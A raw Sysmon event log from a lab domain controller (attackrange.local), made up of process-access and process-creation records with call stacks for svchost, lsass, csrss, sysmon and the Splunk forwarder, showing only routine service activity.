13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429A-6000-4E00-000000009A01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.618{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429A-6000-4E00-000000009A01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.622{08A6967A-429A-6000-4E00-000000009A01}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.571{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.540{08A6967A-429A-6000-4D00-000000009A01}32883356C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.525{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.525{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.478{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.462{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 